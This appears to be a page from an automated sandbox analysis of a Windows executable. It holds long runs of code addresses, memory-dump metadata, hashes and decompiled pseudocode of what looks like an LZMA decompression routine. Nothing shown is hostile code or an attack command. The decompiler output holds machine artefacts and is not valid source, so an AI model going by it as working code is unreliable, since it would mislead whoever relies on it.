                                                                                                                                                                                                                            0x00406f79
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00406f7f
                                                                                                                                                                                                                            0x00406f82
                                                                                                                                                                                                                            0x00406f85
                                                                                                                                                                                                                            0x00406f89
                                                                                                                                                                                                                            0x00406f8c
                                                                                                                                                                                                                            0x00406f92
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f97
                                                                                                                                                                                                                            0x00406f9a
                                                                                                                                                                                                                            0x00406f9a
                                                                                                                                                                                                                            0x00406fa0
                                                                                                                                                                                                                            0x00406f3e
                                                                                                                                                                                                                            0x00406f3e
                                                                                                                                                                                                                            0x00406f41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f41
                                                                                                                                                                                                                            0x00406fa2
                                                                                                                                                                                                                            0x00406fa2
                                                                                                                                                                                                                            0x00406fa5
                                                                                                                                                                                                                            0x00406fa8
                                                                                                                                                                                                                            0x00406fab
                                                                                                                                                                                                                            0x00406fae
                                                                                                                                                                                                                            0x00406fb1
                                                                                                                                                                                                                            0x00406fb4
                                                                                                                                                                                                                            0x00406fb7
                                                                                                                                                                                                                            0x00406fba
                                                                                                                                                                                                                            0x00406fbd
                                                                                                                                                                                                                            0x00406fc0
                                                                                                                                                                                                                            0x00406fd8
                                                                                                                                                                                                                            0x00406fdb
                                                                                                                                                                                                                            0x00406fde
                                                                                                                                                                                                                            0x00406fe1
                                                                                                                                                                                                                            0x00406fe1
                                                                                                                                                                                                                            0x00406fe4
                                                                                                                                                                                                                            0x00406fe8
                                                                                                                                                                                                                            0x00406fea
                                                                                                                                                                                                                            0x00406fc2
                                                                                                                                                                                                                            0x00406fc2
                                                                                                                                                                                                                            0x00406fca
                                                                                                                                                                                                                            0x00406fcf
                                                                                                                                                                                                                            0x00406fd1
                                                                                                                                                                                                                            0x00406fd3
                                                                                                                                                                                                                            0x00406fd3
                                                                                                                                                                                                                            0x00406fed
                                                                                                                                                                                                                            0x00406ff4
                                                                                                                                                                                                                            0x00406ff7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ff9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ff9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407286
                                                                                                                                                                                                                            0x00407286
                                                                                                                                                                                                                            0x0040728a
                                                                                                                                                                                                                            0x004075b1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075b1
                                                                                                                                                                                                                            0x00407290
                                                                                                                                                                                                                            0x00407293
                                                                                                                                                                                                                            0x00407296
                                                                                                                                                                                                                            0x0040729a
                                                                                                                                                                                                                            0x0040729d
                                                                                                                                                                                                                            0x004072a3
                                                                                                                                                                                                                            0x004072a5
                                                                                                                                                                                                                            0x004072a5
                                                                                                                                                                                                                            0x004072a5
                                                                                                                                                                                                                            0x004072a8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407395
                                                                                                                                                                                                                            0x00407399
                                                                                                                                                                                                                            0x004073bb
                                                                                                                                                                                                                            0x004073be
                                                                                                                                                                                                                            0x004073c8
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x0040739b
                                                                                                                                                                                                                            0x0040739e
                                                                                                                                                                                                                            0x004073a2
                                                                                                                                                                                                                            0x004073a5
                                                                                                                                                                                                                            0x004073a5
                                                                                                                                                                                                                            0x004073a8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407452
                                                                                                                                                                                                                            0x00407456
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x0040747b
                                                                                                                                                                                                                            0x00407482
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00407458
                                                                                                                                                                                                                            0x0040745b
                                                                                                                                                                                                                            0x0040745e
                                                                                                                                                                                                                            0x00407461
                                                                                                                                                                                                                            0x00407468
                                                                                                                                                                                                                            0x004073ac
                                                                                                                                                                                                                            0x004073ac
                                                                                                                                                                                                                            0x004073af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407543
                                                                                                                                                                                                                            0x00407546
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040717d
                                                                                                                                                                                                                            0x0040717f
                                                                                                                                                                                                                            0x00407186
                                                                                                                                                                                                                            0x00407187
                                                                                                                                                                                                                            0x00407189
                                                                                                                                                                                                                            0x0040718c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407194
                                                                                                                                                                                                                            0x00407197
                                                                                                                                                                                                                            0x0040719a
                                                                                                                                                                                                                            0x0040719c
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719f
                                                                                                                                                                                                                            0x004071a2
                                                                                                                                                                                                                            0x004071a9
                                                                                                                                                                                                                            0x004071ac
                                                                                                                                                                                                                            0x004071ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407493
                                                                                                                                                                                                                            0x0040749a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x004074a3
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x004074a9
                                                                                                                                                                                                                            0x004074ac
                                                                                                                                                                                                                            0x004074af
                                                                                                                                                                                                                            0x004074b3
                                                                                                                                                                                                                            0x004074b6
                                                                                                                                                                                                                            0x004074bc
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074c1
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074cb
                                                                                                                                                                                                                            0x0040752b
                                                                                                                                                                                                                            0x0040752e
                                                                                                                                                                                                                            0x00407533
                                                                                                                                                                                                                            0x00407534
                                                                                                                                                                                                                            0x00407536
                                                                                                                                                                                                                            0x00407538
                                                                                                                                                                                                                            0x0040753b
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040744d
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004074cd
                                                                                                                                                                                                                            0x004074d3
                                                                                                                                                                                                                            0x004074d6
                                                                                                                                                                                                                            0x004074d9
                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040730a
                                                                                                                                                                                                                            0x0040730e
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407311
                                                                                                                                                                                                                            0x00407314
                                                                                                                                                                                                                            0x00407317
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072e1
                                                                                                                                                                                                                            0x004072e6
                                                                                                                                                                                                                            0x004072e8
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x0040731a
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x00407234
                                                                                                                                                                                                                            0x00407237
                                                                                                                                                                                                                            0x00407239
                                                                                                                                                                                                                            0x0040723c
                                                                                                                                                                                                                            0x0040723f
                                                                                                                                                                                                                            0x00407242
                                                                                                                                                                                                                            0x00407244
                                                                                                                                                                                                                            0x00407247
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x00407250
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x004071dd
                                                                                                                                                                                                                            0x004071e0
                                                                                                                                                                                                                            0x004071e2
                                                                                                                                                                                                                            0x004071e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f48
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00406f4e
                                                                                                                                                                                                                            0x00406f51
                                                                                                                                                                                                                            0x00406f54
                                                                                                                                                                                                                            0x00406f57
                                                                                                                                                                                                                            0x00406f5a
                                                                                                                                                                                                                            0x00406f5d
                                                                                                                                                                                                                            0x00406f60
                                                                                                                                                                                                                            0x00406f62
                                                                                                                                                                                                                            0x00406f65
                                                                                                                                                                                                                            0x00406f68
                                                                                                                                                                                                                            0x00406f6b
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070d3
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x004070d9
                                                                                                                                                                                                                            0x004070dc
                                                                                                                                                                                                                            0x004070df
                                                                                                                                                                                                                            0x004070e2
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e7
                                                                                                                                                                                                                            0x004070ea
                                                                                                                                                                                                                            0x004070ed
                                                                                                                                                                                                                            0x004070f0
                                                                                                                                                                                                                            0x004070f3
                                                                                                                                                                                                                            0x004070f6
                                                                                                                                                                                                                            0x004070f7
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070fc
                                                                                                                                                                                                                            0x004070ff
                                                                                                                                                                                                                            0x00407102
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407108
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x00407350
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407359
                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407120

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                                                                                                                            • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
